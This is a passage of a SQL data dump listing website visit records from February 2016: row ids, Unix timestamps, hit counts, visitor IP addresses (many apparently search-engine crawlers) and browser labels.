,0,0,'66.249.91.63','other'),(2694,1455311788,4,4,0,0,'141.8.184.18','other'),(2695,1455311792,2,2,0,0,'5.255.253.95','other'),(2696,1455311800,1,1,0,0,'178.154.189.17','other'),(2697,1455311813,2,2,0,0,'141.8.132.34','other'),(2698,1455311817,1,1,0,0,'93.158.152.14','other'),(2699,1455311822,2,2,0,0,'130.193.51.38','other'),(2700,1455311826,1,1,0,0,'141.8.142.50','other'),(2701,1455311831,1,1,0,0,'130.193.51.17','other'),(2702,1455311843,1,1,0,0,'141.8.132.71','other'),(2703,1455312925,1,1,0,0,'213.180.206.205','other'),(2704,1455313107,1,1,0,0,'157.55.39.16','other'),(2705,1455313464,1,0,1,0,'66.249.69.102',''),(2706,1455314269,1,0,1,0,'68.180.229.232',''),(2707,1455314422,1,1,0,0,'157.55.39.112','other'),(2708,1455314623,1,1,0,0,'93.158.152.44','other'),(2710,1455314624,1,1,0,0,'5.255.253.24','other'),(2711,1455315183,1,0,1,0,'66.249.69.94',''),(2712,1455315692,1,1,0,0,'207.46.13.177','other'),(2713,1455316055,1,0,1,0,'66.249.69.124',''),(2714,1455316712,1,1,0,0,'62.210.215.100','chrome'),(2716,1455316776,1,0,1,0,'66.249.69.3',''),(2717,1455317829,1,0,1,0,'68.180.229.232',''),(2718,1455318211,2,0,2,0,'66.249.69.11',''),(2719,1455318775,1,1,0,0,'180.76.15.27','other'),(2720,1455318901,1,1,0,0,'157.55.39.72','other'),(2721,1455318957,3,0,3,0,'66.249.69.3',''),(2722,1455319504,1,1,0,0,'93.158.152.46','other'),(2723,1455319505,1,1,0,0,'141.8.142.50','other'),(2724,1455319889,2,0,2,0,'68.180.229.232',''),(2725,1455320220,1,0,1,0,'66.249.69.102',''),(2726,1455320291,1,1,0,0,'8.29.198.26','other'),(2727,1455320422,2,0,2,0,'66.249.69.3',''),(2728,1455320609,1,1,0,0,'217.69.136.210','other'),(2729,1455322040,1,1,0,0,'5.255.253.95','other'),(2730,1455322045,1,1,0,0,'130.193.51.29','other'),(2731,1455322049,1,1,0,0,'141.8.184.18','other'),(2732,1455322501,1,1,0,0,'66.249.91.4','other'),(2733,1455322580,1,0,1,0,'66.249.69.3',''),(2734,1455322929,2,0,2,0,'66.249.69.124',''),(2735,1455322937,1,0,1,0,'66.249.69.94',''),(2736,1455323026,1,1,0,0,'93.158.152.75','other'),(2737,1455323399,2,2,0,0,'207.46.13.177','other'),(2738,1455324091,1,0,1,0,'66.249.69.11',''),(2739,1455324183,1,1,0,0,'217.69.143.70','other'),(2740,1455324298,1,1,0,0,'180.76.15.14','other'),(2741,1455324519,296,296,0,0,'82.193.127.15','other'),(2742,1455324625,2,0,2,0,'68.180.229.232',''),(2743,1455324831,1,0,1,0,'66.249.69.124',''),(2744,1455324979,1,1,0,0,'157.55.39.54','other'),(2745,1455325050,1,1,0,0,'101.226.167.238','chrome'),(2746,1455325137,1,0,1,0,'66.249.69.11',''),(2747,1455325604,1,1,0,0,'182.118.20.173','msie'),(2748,1455326251,1,1,0,0,'157.55.39.110','other'),(2749,1455326386,1,1,0,0,'157.55.39.112','other'),(2750,1455326535,1,0,1,0,'68.180.229.232',''),(2751,1455326718,1,0,1,0,'66.249.69.3',''),(2752,1455326861,1,1,0,0,'171.13.14.25','other'),(2753,1455328374,1,1,0,0,'157.55.39.110','other'),(2754,1455328381,1,0,1,0,'66.249.69.124',''),(2755,1455329602,2,0,2,0,'66.249.69.3',''),(2756,1455330411,1,0,1,0,'66.249.69.11',''),(2757,1455330704,1,1,0,0,'37.48.74.42','chrome'),(2758,1455330721,1,1,0,0,'77.247.181.162','chrome'),(2759,1455331099,1,1,0,0,'8.29.198.25','other'),(2760,1455331201,1,1,0,0,'157.55.39.54','other'),(2761,1455331268,1,0,1,0,'66.249.69.3',''),(2762,1455331354,1,1,0,0,'217.69.143.70','other'),(2763,1455331814,1,0,1,0,'66.249.69.11',''),(2764,1455331851,1,0,1,0,'66.249.69.124',''),(2765,1455332157,1,1,0,0,'93.158.152.5','other'),(2766,1455332319,1,1,0,0,'62.210.215.100','chrome'),(2767,1455332648,1,1,0,0,'141.8.184.18','other'),(2768,1455332942,1,1,0,0,'217.69.143.51','other'),(2769,1455333157,1,0,1,0,'66.249.69.3',''),(2770,1455333240,1,1,0,0,'66.249.91.4','other'),(2771,1455333642,1,0,1,0,'68.180.229.232',''),(2772,1455334646,1,1,0,0,'217.69.143.48','other'),(2773,1455334912,1,0,1,0,'66.249.69.124',''),(2774,1455335896,1,1,0,0,'141.8.184.18','other'),(2775,1455336110,1,0,1,0,'68.180.229.232',''),(2776,1455337015,1,1,0,0,'157.55.39.110','other'),(2777,1455337133,1,0,1,0,'66.249.69.110',''),(2778,1455338025,1,1,0,0,'95.25.29.207','msie'),(2779,1455338148,1,1,0,0,'141.8.184.18','other'),(2780,1455338240,1,1,0,0,'180.76.15.135','other'),(2781,1455338302,1,1,0,0,'207.46.13.177','other'),(2782,1455338828,2,0,2,0,'66.249.69.11',''),(2783,1455339019,4,0,4,0,'66.249.69.124',''),(2784,1455339027,2,0,2,0,'66.249.69.3',''),(2785,1455339049,1,1,0,0,'217.69.143.69','other'),(2786,1455339239,1,1,0,0,'180.76.15.31','other'),(2787,1455339752,1,0,1,0,'66.249.69.11',''),(2788,1455339997,1,0,1,0,'66.249.69.3',''),(2789,1455340137,124,124,0,0,'82.193.127.15','other'),(2790,1455340304,1,1,0,0,'207.46.13.177','other'),(2791,1455341021,2,0,2,0,'66.249.69.3',''),(2792,1455341752,1,0,1,0,'66.249.69.124',''),(2793,1455341849,1,1,0,0,'157.55.39.112','other'),(2794,1455341913,1,1,0,0,'188.244.47.215','msie'),(2795,1455341925,1,1,0,0,'8.29.198.26','other'),(2796,1455342264,4,4,0,0,'141.8.184.18','other'),(2797,1455342537,1,1,0,0,'82.145.219.78','other'),(2798,1455342790,1,1,0,0,'66.102.9.104','firefox'),(2799,1455343252,1,0,1,0,'68.180.229.232',''),(2800,1455343417,3,0,3,0,'66.249.69.3',''),(2801,1455343503,1,1,0,0,'157.55.39.54','other'),(2802,1455343881,1,1,0,0,'66.249.91.63','other'),(2803,1455344174,1,1,0,0,'217.69.143.44','other'),(2804,1455344177,1,1,0,0,'217.69.143.46','other'),(2805,1455344193,2,0,2,0,'68.180.229.232',''),(2806,1455344511,1,0,1,0,'66.249.69.3',''),(2807,1455345397,1,0,1,0,'66.249.69.11',''),(2808,1455346522,2,0,2,0,'66.249.69.124',''),(2809,1455347461,1,1,0,0,'207.46.13.177','other'),(2810,1455347596,1,0,1,0,'66.249.69.3',''),(2811,1455348248,2,2,0,0,'157.55.39.54','other'),(2812,1455349004,2,0,2,0,'66.249.69.3',''),(2813,1455349026,1,1,0,0,'66.249.93.94','firefox'),(2814,1455349336,1,1,0,0,'157.55.39.112','other'),(2815,1455349598,1,1,0,0,'157.55.39.110','other'),(2816,1455350055,1,1,0,0,'95.220.120.242','msie'),(2817,1455350398,1,1,0,0,'178.154.189.17','other'),(2818,1455350402,1,1,0,0,'141.8.184.18','other'),(2819,1455351344,1,1,0,0,'178.92.250.65','firefox'),(2820,1455351702,1,1,0,0,'93.158.152.8','other'),(2821,1455351707,1,1,0,0,'141.8.142.35','other'),(2822,1455351711,1,1,0,0,'178.154.189.17','other'),(2823,1455351715,1,1,0,0,'5.255.253.99','other'),(2824,1455351719,1,1,0,0,'141.8.132.10','other'),(2825,1455351724,1,1,0,0,'141.8.132.45','other'),(2826,1455351932,1,1,0,0,'46.133.111.20','other'),(2827,1455352741,1,1,0,0,'8.29.198.25','other'),(2828,1455352892,1,1,0,0,'178.92.250.65','firefox'),(2829,1455353158,1,0,1,0,'68.180.229.232',''),(2830,1455353372,1,1,0,0,'141.8.184.18','other'),(2831,1455353636,1,1,0,0,'157.55.39.112','other'),(2832,1455353825,10,10,0,0,'78.129.149.11','firefox'),(2833,1455353939,1,1,0,0,'157.55.39.110','other'),(2834,1455354733,1,1,0,0,'157.55.39.54','other'),(2835,1455355073,1,1,0,0,'213.174.7.39','firefox'),(2836,1455355090,1,1,0,0,'217.69.143.69','other'),(2837,1455355161,1,1,0,0,'66.249.91.8','other'),(2838,1455355212,1,1,0,0,'217.69.136.205','other'),(2839,1455355454,1,1,0,0,'62.210.215.100','chrome'),(2840,1455355977,1,1,0,0,'217.69.143.62','other'),(2841,1455356023,1,0,1,0,'66.249.69.124',''),(2842,1455356024,1,1,0,0,'213.174.7.39','chrome'),(2843,1455356762,2,0,2,0,'68.180.229.232',''),(2844,1455356788,1,0,1,0,'66.249.69.11',''),(2845,1455359139,1,1,0,0,'217.69.143.49','other'),(2846,1455359308,1,0,1,0,'66.249.69.3',''),(2847,1455359991,2,0,2,0,'68.180.229.232',''),(2848,1455360581,1,1,0,0,'217.12.204.94','msie'),(2849,1455360929,3,3,0,0,'141.8.184.18','other'),(2850,1455360933,2,2,0,0,'5.255.253.95','other'),(2851,1455360942,3,3,0,0,'141.8.132.10','other'),(2852,1455360954,1,1,0,0,'178.154.189.17','other'),(2853,1455360970,1,1,0,0,'157.55.39.54','other'),(2854,1455361476,1,1,0,0,'91.196.178.12','firefox'),(2855,1455361958,1,1,0,0,'5.255.253.99','other'),(2856,1455361977,4,4,0,0,'5.255.253.95','other'),(2857,1455362043,4,4,0,0,'141.8.184.18','other'),(2858,1455362071,1,1,0,0,'141.8.132.10','other'),(2859,1455362452,1,0,1,0,'66.249.69.11',''),(2860,1455362724,1,0,1,0,'68.180.229.232',''),(2861,1455363092,2,2,0,0,'141.8.184.29','other'),(2862,1455363574,1,1,0,0,'8.29.198.25','other'),(2863,1455363771,1,1,0,0,'46.118.13.110','other'),(2864,1455363785,2,2,0,0,'130.193.51.17','other'),(2865,1455363893,2,2,0,0,'178.154.189.26','other'),(2866,1455363897,1,1,0,0,'5.255.253.89','other'),(2867,1455363901,1,1,0,0,'93.158.152.8','other'),(2868,1455363905,1,1,0,0,'141.8.132.52','other'),(2869,1455363909,1,1,0,0,'141.8.132.10','other'),(2870,1455363917,15,15,0,0,'5.255.253.95','other'),(2871,1455363922,1,1,0,0,'130.193.51.29','other'),(2872,1455363926,4,4,0,0,'5.255.253.99','other'),(2873,1455363930,1,1,0,0,'130.193.37.18','other'),(2874,1455363934,1,1,0,0,'93.158.152.14','other'),(2875,1455363938,1,1,0,0,'141.8.132.34','other'),(2876,1455363942,2,2,0,0,'178.154.189.17','other'),(2877,1455363947,1,1,0,0,'93.158.152.46','other'),(2878,1455363951,2,2,0,0,'130.193.51.26','other'),(2879,1455363963,14,14,0,0,'141.8.184.18','other'),(2880,1455363975,1,1,0,0,'93.158.152.53','other'),(2881,1455363980,1,1,0,0,'141.8.142.35','other'),(2882,1455364369,1,1,0,0,'46.211.115.145','chrome'),(2883,1455364481,1,1,0,0,'157.55.39.112','other'),(2884,1455364706,1,1,0,0,'136.243.103.165','other'),(2885,1455364727,1,0,1,0,'66.249.69.124',''),(2886,1455365633,4,4,0,0,'141.8.184.18','other'),(2887,1455366241,1,1,0,0,'66.249.91.8','other'),(2888,1455366665,1,0,1,0,'66.249.69.11',''),(2889,1455366703,3,3,0,0,'94.22.47.242','other'),(2890,1455367207,1,1,0,0,'217.69.143.67','other'),(2891,1455367497,1,0,1,0,'68.180.229.232',''),(2892,1455368380,1,0,1,0,'66.249.69.124',''),(2893,1455369074,1,1,0,0,'217.69.143.66','other'),(2894,1455369138,5,5,0,0,'80.91.162.99','other'),(2895,1455369510,1,0,1,0,'66.249.69.11',''),(2896,1455369652,1,1,0,0,'141.8.132.10','other'),(2897,1455369656,4,4,0,0,'5.255.253.95','other'),(2898,1455369660,8,8,0,0,'141.8.184.18','other'),(2899,1455369699,1,1,0,0,'178.154.189.17','other'),(2900,1455369727,1,0,1,0,'66.249.69.110',''),(2901,1455370798,3,3,0,0,'199.58.86.206','other'),(2902,1455371276,1,0,1,0,'66.249.69.11',''),(2903,1455372183,1,1,0,0,'62.210.215.100','chrome'),(2904,1455372709,12,12,0,0,'37.187.149.30','firefox'),(2905,1455372818,1,1,0,0,'217.69.143.64','other'),(2906,1455372893,1,1,0,0,'217.69.136.209','other'),(2907,1455373192,3,3,0,0,'141.8.184.18','other'),(2908,1455373199,2,2,0,0,'5.255.253.95','other'),(2909,1455373543,1,0,1,0,'66.249.69.11',''),(2910,1455374383,1,1,0,0,'8.29.198.26','other'),(2911,1455374632,12,12,0,0,'89.218.71.214','firefox'),(2912,1455375120,2,2,0,0,'141.8.184.18','other'),(2913,1455375124,1,1,0,0,'130.193.51.17','other'),(2914,1455375131,1,1,0,0,'93.158.152.8','other'),(2915,1455375284,62,62,0,0,'23.81.27.114','msie'),(2916,1455376037,1,1,0,0,'62.210.215.100','chrome'),(2917,1455376141,1,1,0,0,'217.69.143.46','other'),(2918,1455376417,1,1,0,0,'178.151.143.163','other'),(2919,1455376977,2,2,0,0,'5.255.253.95','other'),(2920,1455376983,1,1,0,0,'5.255.253.99','other'),(2921,1455377150,1,1,0,0,'66.249.91.4','other'),(2922,1455377325,1,1,0,0,'93.158.152.64','other'),(2923,1455377327,1,1,0,0,'5.255.253.30','other'),(2924,1455377335,1,1,0,0,'5.255.253.82','other'),(2925,1455377337,1,1,0,0,'130.193.51.59','other'),(2926,1455378050,1,1,0,0,'95.158.49.193','firefox'),(2927,1455378357,59,59,0,0,'5.9.85.4','other'),(2928,1455378430,1,1,0,0,'157.55.39.110','other'),(2929,1455378473,1,1,0,0,'217.69.143.66','other'),(2930,1455378926,1,1,0,0,'37.53.76.152','chrome'),(2931,1455379021,1,1,0,0,'157.55.39.112','other'),(2932,1455379050,1,1,0,0,'193.161.14.195','chrome'),(2933,1455379471,1,1,0,0,'157.55.39.54','other'),(2934,1455379976,1,0,1,0,'66.249.69.124',''),(2935,1455380229,7,7,0,0,'82.193.127.15','other'),(2936,1455380749,3,3,0,0,'141.8.184.18','other'),(2937,1455380751,2,2,0,0,'178.154.189.17','other'),(2938,1455380754,1,1,0,0,'5.255.253.95','other'),(2939,1455380978,1,1,0,0,'213.174.7.16','chrome'),(2940,1455381211,1,1,0,0,'157.55.39.176','other'),(2941,1455381543,1,1,0,0,'192.99.37.190','other'),(2942,1455382607,2,2,0,0,'177.75.16.71','other'),(2943,1455383067,2,0,2,0,'66.249.64.172',''),(2944,1455383949,1,0,1,0,'66.249.64.177',''),(2945,1455384230,1,1,0,0,'193.194.127.217','firefox'),(2946,1455384523,1,1,0,0,'157.55.39.54','other'),(2947,1455385205,1,1,0,0,'8.29.198.25','other'),(2948,1455385836,2,2,0,0,'217.113.158.226','other'),(2949,1455385863,1,1,0,0,'217.113.158.226','firefox'),(2950,1455387116,1,0,1,0,'68.180.229.232',''),(2951,1455388082,1,1,0,0,'217.66.99.242','chrome'),(2952,1455388159,1,0,1,0,'68.180.229.232',''),(2953,1455388370,28,28,0,0,'91.209.51.22','other'),(2954,1455388481,1,1,0,0,'66.249.89.87','other'),(2955,1455388759,1,1,0,0,'101.226.168.200','chrome'),(2956,1455389383,1,1,0,0,'157.55.39.112','other'),(2957,1455390315,1,0,1,0,'66.249.64.172',''),(2958,1455390521,1,1,0,0,'217.69.143.59','other'),(2959,1455390939,1,1,0,0,'91.196.178.9','chrome'),(2960,1455391232,1,0,1,0,'68.180.229.232',''),(2961,1455391387,1,0,1,0,'66.249.64.177',''),(2962,1455391516,1,1,0,0,'217.69.143.69','other'),(2963,1455391605,1,1,0,0,'157.55.39.155','other'),(2964,1455391668,2,0,2,0,'66.249.64.172',''),(2965,1455392193,1,1,0,0,'157.55.39.217','other'),(2966,1455393122,1,1,0,0,'213.174.7.33','chrome'),(2967,1455393205,1,1,0,0,'217.69.143.71','other'),(2968,1455393209,1,0,1,0,'66.249.64.177',''),(2969,1455393218,2,0,2,0,'66.249.64.172',''),(2970,1455393846,1,0,1,0,'66.249.64.182',''),(2971,1455394140,1,1,0,0,'157.55.39.155','other'),(2972,1455394284,8,0,8,0,'66.249.64.172',''),(2973,1455394317,1,1,0,0,'62.210.215.100','chrome'),(2974,1455394487,3,0,3,0,'66.249.64.177',''),(2975,1455394513,1,0,1,0,'68.180.229.232',''),(2976,1455394697,1,1,0,0,'157.55.39.112','other'),(2977,1455395233,10,0,10,0,'66.249.64.172',''),(2978,1455395399,1,1,0,0,'217.69.143.69','other'),(2979,1455395735,2,0,2,0,'66.249.64.177',''),(2980,1455396064,1,1,0,0,'8.29.198.25','other'),(2981,1455396195,7,0,7,0,'66.249.64.172',''),(2982,1455396310,148,148,0,0,'82.193.127.15','other'),(2983,1455396715,2,0,2,0,'66.249.64.182',''),(2984,1455396746,1,0,1,0,'66.249.64.177',''),(2985,1455396966,1,1,0,0,'178.92.250.65','firefox'),(2986,1455397106,3,0,3,0,'66.249.64.172',''),(2987,1455398232,4,0,4,0,'66.249.64.182',''),(2988,1455398254,1,0,1,0,'66.249.64.27',''),(2989,1455398343,1,1,0,0,'157.55.39.54','other'),(2990,1455398454,1,1,0,0,'185.26.182.41','chrome'),(2991,1455398638,1,0,1,0,'66.249.64.32',''),(2992,1455398745,4,0,4,0,'66.249.64.177',''),(2993,1455398777,1,1,0,0,'217.69.143.46','other'),(2994,1455398900,1,1,0,0,'66.249.89.87','other'),(2995,1455398960,3,0,3,0,'66.249.64.172',''),(2996,1455399485,1,1,0,0,'178.93.150.130','chrome'),(2997,1455400222,1,0,1,0,'66.249.64.177',''),(2998,1455400392,1,0,1,0,'66.249.64.172',''),(2999,1455401489,1,1,0,0,'157.55.39.217','other'),(3000,1455401713,4,0,4,0,'66.249.64.172',''),(3001,1455401729,3,0,3,0,'66.249.64.177',''),(3002,1455402636,1,0,1,0,'68.180.229.232',''),(3003,1455402796,1,0,1,0,'66.249.64.182',''),(3004,1455403021,1,1,0,0,'217.69.143.55','other'),(3005,1455403115,7,0,7,0,'66.249.64.172',''),(3006,1455403574,1,0,1,0,'68.180.229.232',''),(3007,1455404406,1,1,0,0,'180.76.15.18','other'),(3008,1455405066,2,0,2,0,'66.249.64.177',''),(3009,1455405256,1,0,1,0,'68.180.229.232',''),(3010,1455405934,1,0,1,0,'66.249.64.172',''),(3011,1455406128,2,0,2,0,'66.249.64.177',''),(3012,1455406278,1,1,0,0,'157.55.39.54','other'),(3013,1455406384,1,0,1,0,'66.249.64.182',''),(3014,1455406415,1,1,0,0,'180.76.15.136','other'),(3015,1455406431,1,1,0,0,'180.76.15.135','other'),(3016,1455406513,2,2,0,0,'157.55.39.217','other'),(3017,1455406881,1,1,0,0,'8.29.198.25','other'),(3018,1455407065,1,1,0,0,'217.69.136.208','other'),(3019,1455407502,1,1,0,0,'217.69.143.61','other'),(3020,1455407586,2,0,2,0,'68.180.229.232',''),(3021,1455408468,1,0,1,0,'66.249.64.177',''),(3022,1455408487,1,0,1,0,'66.249.64.182',''),(3023,1455408981,1,1,0,0,'157.55.39.155','other'),(3024,1455410019,1,1,0,0,'217.69.143.52','other'),(3025,1455410022,1,0,1,0,'66.249.64.177',''),(3026,1455410039,1,1,0,0,'217.69.143.65','other'),(3027,1455410050,1,1,0,0,'66.249.89.90','other'),(3028,1455410237,2,0,2,0,'66.249.64.182',''),(3029,1455410259,2,0,2,0,'66.249.64.172',''),(3030,1455411389,1,1,0,0,'157.55.39.155','other'),(3031,1455411587,5,5,0,0,'144.76.29.66','other'),(3032,1455411781,1,1,0,0,'157.55.39.112','other'),(3033,1455412177,1,0,1,0,'66.249.64.182',''),(3034,1455412303,1,0,1,0,'66.249.64.177',''),(3035,1455413082,1,0,1,0,'66.249.64.172',''),(3036,1455413123,1,1,0,0,'157.55.39.112','other'),(3037,1455413294,1,0,1,0,'68.180.229.232',''),(3038,1455413650,3,0,3,0,'66.249.64.182',''),(3039,1455414173,1,1,0,0,'95.133.238.202','chrome'),(3040,1455414272,1,0,1,0,'68.180.229.232',''),(3041,1455414804,7,0,7,0,'66.249.64.172',''),(3042,1455414829,2,0,2,0,'66.249.64.177',''),(3043,1455415747,1,1,0,0,'217.69.143.63','other'),(3044,1455416267,1,1,0,0,'157.55.39.155','other'),(3045,1455416360,1,0,1,0,'66.249.64.182',''),(3046,1455416427,1,1,0,0,'66.249.93.86','chrome'),(3047,1455416459,1,1,0,0,'8.29.198.39','other'),(3048,1455416461,1,1,0,0,'213.174.7.30','chrome'),(3049,1455416462,1,1,0,0,'66.102.9.104','firefox'),(3050,1455416463,1,1,0,0,'66.102.9.94','firefox'),(3051,1455416471,1,1,0,0,'213.174.7.30','other'),(3052,1455416505,1,1,0,0,'217.69.136.207','other'),(3053,1455416524,1,1,0,0,'66.249.81.208','other'),(3054,1455416592,1,1,0,0,'66.102.9.84','firefox'),(3055,1455416914,2,2,0,0,'128.199.35.24','other'),(3056,1455417205,3,3,0,0,'159.203.75.59','other'),(3057,1455417690,1,1,0,0,'8.29.198.25','other'),(3058,1455418077,3,3,0,0,'128.199.35.24','other'),(3059,1455418658,4,0,4,0,'66.249.64.182',''),(3060,1455419008,2,0,2,0,'66.249.64.177',''),(3061,1455419770,1,1,0,0,'157.55.39.155','other'),(3062,1455419789,1,1,0,0,'5.255.253.24','other'),(3063,1455419792,1,1,0,0,'93.158.152.64','other'),(3064,1455420159,1,0,1,0,'66.249.64.182',''),(3065,1455420209,1,1,0,0,'66.249.81.208','other'),(3066,1455420507,1,1,0,0,'157.55.39.112','other'),(3067,1455420701,1,1,0,0,'66.249.89.93','other'),(3068,1455420910,1,1,0,0,'5.255.253.99','other'),(3069,1455421643,3,0,3,0,'66.249.64.172',''),(3070,1455422002,1,1,0,0,'217.69.136.203','other'),(3071,1455422466,1,1,0,0,'130.193.51.29','other'),(3072,1455422526,1,1,0,0,'141.8.142.50','other'),(3073,1455422683,1,1,0,0,'178.154.189.204','other'),(3074,1455422972,2,0,2,0,'66.249.64.182',''),(3075,1455423190,1,0,1,0,'66.249.64.177',''),(3076,1455423473,1,0,1,0,'66.249.64.172',''),(3077,1455423917,1,1,0,0,'66.249.81.211','other'),(3078,1455424312,1,1,0,0,'93.158.152.5','other'),(3079,1455424326,1,1,0,0,'217.69.143.59','other'),(3080,1455424327,1,1,0,0,'217.69.143.55','other'),(3081,1455424364,1,0,1,0,'68.180.229.232',''),(3082,1455425238,2,2,0,0,'157.55.39.155','other'),(3083,1455425576,4,0,4,0,'66.249.64.172',''),(3084,1455426018,1,1,0,0,'141.8.132.34','other'),(3085,1455426022,1,1,0,0,'141.8.132.45','other'),(3086,1455426195,1,0,1,0,'68.180.229.232',''),(3087,1455426196,3,0,3,0,'66.249.64.177',''),(3088,1455426415,1,1,0,0,'157.55.39.112','other'),(3089,1455426477,1,0,1,0,'66.249.64.172',''),(3090,1455426914,1,1,0,0,'157.55.39.54','other'),(3091,1455426949,1,1,0,0,'217.69.143.52','other'),(3092,1455427362,1,1,0,0,'66.249.81.211','other'),(3093,1455427649,1,0,1,0,'68.180.229.232',''),(3094,1455427882,7,7,0,0,'5.255.253.95','other'),(3095,1455427928,1,0,1,0,'66.249.64.177',''),(3096,1455428306,15,15,0,0,'141.8.184.18','other'),(3097,1455428355,1,1,0,0,'5.255.253.99','other'),(3098,1455428368,2,2,0,0,'178.154.189.17','other'),(3099,1455428514,1,1,0,0,'8.29.198.26','other'),(3100,1455428615,1,1,0,0,'180.76.15.23','other'),(3101,1455429254,1,1,0,0,'217.69.143.48','other'),(3102,1455429483,2,0,2,0,'66.249.64.182',''),(3103,1455429918,1,0,1,0,'68.180.229.232',''),(3104,1455429988,6,6,0,0,'5.255.253.95','other'),(3105,1455430013,2,2,0,0,'141.8.184.18','other'),(3106,1455430975,1,0,1,0,'66.249.64.172',''),(3107,1455431030,1,1,0,0,'66.249.81.205','other'),(3108,1455431423,1,1,0,0,'217.69.143.70','other'),(3109,1455431489,1,1,0,0,'157.55.39.54','other'),(3110,1455431490,1,1,0,0,'66.249.89.87','other'),(3111,1455432122,1,1,0,0,'94.179.51.152','firefox'),(3112,1455432282,1,1,0,0,'141.8.183.27','other'),(3113,1455432309,1,1,0,0,'62.210.215.100','chrome'),(3114,1455432593,1,1,0,0,'157.55.39.54','other'),(3115,1455432752,1,0,1,0,'66.249.64.172',''),(3116,1455433377,1,1,0,0,'130.193.51.66','other'),(3117,1455433382,1,1,0,0,'93.158.152.47','other'),(3118,1455433386,1,1,0,0,'141.8.183.23','other'),(3119,1455433390,1,1,0,0,'93.158.152.75','other'),(3120,1455433394,1,1,0,0,'141.8.132.71','other'),(3121,1455433398,1,1,0,0,'141.8.184.19','other'),(3122,1455433426,1,1,0,0,'141.8.183.22','other'),(3123,1455433444,1,1,0,0,'130.193.51.48','other'),(3124,1455433464,1,1,0,0,'5.255.253.30','other'),(3125,1455433468,1,1,0,0,'141.8.132.27','other'),(3126,1455433597,1,1,0,0,'141.8.184.29','other'),(3127,1455433801,1,1,0,0,'62.210.215.100','chrome'),(3128,1455434025,1,0,1,0,'66.249.64.182',''),(3129,1455434505,2,0,2,0,'66.249.64.177',''),(3130,1455434625,1,1,0,0,'66.249.81.205','other'),(3131,1455434661,1,1,0,0,'141.8.184.18','other'),(3132,1455434958,1,1,0,0,'157.55.39.54','other'),(3133,1455435440,1,1,0,0,'5.255.253.99','other'),(3134,1455435445,1,1,0,0,'66.249.93.94','firefox'),(3135,1455435509,1,1,0,0,'217.69.143.57','other'),(3136,1455435797,1,0,1,0,'66.249.64.182',''),(3137,1455435806,33,33,0,0,'141.8.184.18','other'),(3138,1455435810,1,0,1,0,'66.249.64.172',''),(3139,1455435811,7,7,0,0,'5.255.253.95','other'),(3140,1455437000,300,300,0,0,'80.91.162.99','other'),(3141,1455437057,29,29,0,0,'82.193.127.15','other'),(3142,1455437368,2,0,2,0,'68.180.229.232',''),(3143,1455437662,1,1,0,0,'157.55.39.112','other'),(3144,1455437739,1,0,1,0,'66.249.64.172',''),(3145,1455438231,1,1,0,0,'66.249.81.205','other'),(3146,1455438324,1,1,0,0,'141.8.184.18','other'),(3147,1455438596,1,1,0,0,'178.92.250.65','firefox'),(3148,1455438649,13,0,13,0,'66.249.64.172',''),(3149,1455439248,4,0,4,0,'66.249.64.177',''),(3150,1455439353,1,1,0,0,'8.29.198.26','other'),(3151,1455439605,10,10,0,0,'91.194.84.106','other'),(3152,1455439704,1,1,0,0,'37.52.22.38','chrome'),(3153,1455439746,1,1,0,0,'78.111.185.135','chrome'),(3154,1455439800,1,1,0,0,'217.69.143.51','other'),(3155,1455439801,1,1,0,0,'217.69.143.45','other'),(3156,1455439850,15,0,15,0,'66.249.64.172',''),(3157,1455440030,1,1,0,0,'141.8.142.76','other'),(3158,1455440234,1,0,1,0,'66.249.64.177',''),(3159,1455440264,2,0,2,0,'66.249.64.27',''),(3160,1455440557,1,1,0,0,'157.55.39.71','other'),(3161,1455440703,1,0,1,0,'66.249.64.22',''),(3162,1455441025,1,0,1,0,'66.249.64.172',''),(3163,1455441184,1,1,0,0,'141.8.184.29','other'),(3164,1455441189,1,1,0,0,'5.255.253.89','other'),(3165,1455441791,1,1,0,0,'66.249.89.93','other'),(3166,1455442201,2,2,0,0,'93.158.152.5','other'),(3167,1455442205,2,2,0,0,'93.158.152.46','other'),(3168,1455442213,1,1,0,0,'141.8.142.50','other'),(3169,1455442217,1,1,0,0,'141.8.132.71','other'),(3170,1455442225,1,1,0,0,'130.193.51.17','other'),(3171,1455442229,1,1,0,0,'5.255.253.95','other'),(3172,1455442233,1,1,0,0,'178.154.189.26','other'),(3173,1455442284,2,0,2,0,'66.249.64.177',''),(3174,1455442592,1,1,0,0,'157.55.39.54','other'),(3175,1455442678,1,0,1,0,'66.249.64.182',''),(3176,1455443198,1,0,1,0,'68.180.229.232',''),(3177,1455443552,1,1,0,0,'213.174.7.39','chrome'),(3178,1455443586,1,1,0,0,'157.55.39.54','other'),(3179,1455443791,1,1,0,0,'217.69.143.63','other'),(3180,1455444008,1,1,0,0,'130.193.51.17','other'),(3181,1455444124,1,1,0,0,'141.8.132.52','other'),(3182,1455444435,1,0,1,0,'66.249.64.172',''),(3183,1455444780,1,0,1,0,'66.249.64.177',''),(3184,1455444842,1,1,0,0,'207.46.13.121','other'),(3185,1455445373,1,0,1,0,'66.249.64.172',''),(3186,1455445506,1,0,1,0,'66.249.64.182',''),(3187,1455445514,1,1,0,0,'66.249.81.205','other'),(3188,1455445676,1,1,0,0,'141.8.132.52','other'),(3189,1455445757,1,1,0,0,'157.55.39.112','other'),(3190,1455445765,1,1,0,0,'157.55.39.69','other'),(3191,1455445918,1,1,0,0,'82.145.218.235','other'),(3192,1455446022,1,1,0,0,'180.76.15.152','other'),(3193,1455446468,2,0,2,0,'66.249.64.177',''),(3194,1455447138,2,0,2,0,'157.55.39.54',''),(3195,1455447228,1,0,1,0,'66.249.64.182',''),(3196,1455447437,1,1,0,0,'157.55.39.71','other'),(3197,1455447508,3,0,3,0,'66.249.64.177',''),(3198,1455448208,1,0,1,0,'66.249.64.172',''),(3199,1455448881,1,0,1,0,'66.249.64.182',''),(3200,1455449321,1,1,0,0,'213.174.7.29','chrome'),(3201,1455449630,1,0,1,0,'66.249.64.177',''),(3202,1455449648,1,1,0,0,'173.234.159.250','other'),(3203,1455450176,1,1,0,0,'8.29.198.25','other'),(3204,1455450266,1,1,0,0,'78.111.185.116','opera'),(3205,1455450544,1,1,0,0,'207.46.13.121','other'),(3206,1455450763,2,0,2,0,'66.249.64.182',''),(3207,1455450893,1,1,0,0,'157.55.39.71','other'),(3208,1455451475,1,0,1,0,'66.249.64.172',''),(3209,1455451565,1,0,1,0,'66.249.64.177',''),(3210,1455452165,1,1,0,0,'109.207.89.89','msie'),(3211,1455452180,1,1,0,0,'180.76.15.20','other'),(3212,1455452181,1,1,0,0,'66.249.89.87','other'),(3213,1455452475,1,1,0,0,'157.55.39.71','other'),(3214,1455452772,1,0,1,0,'68.18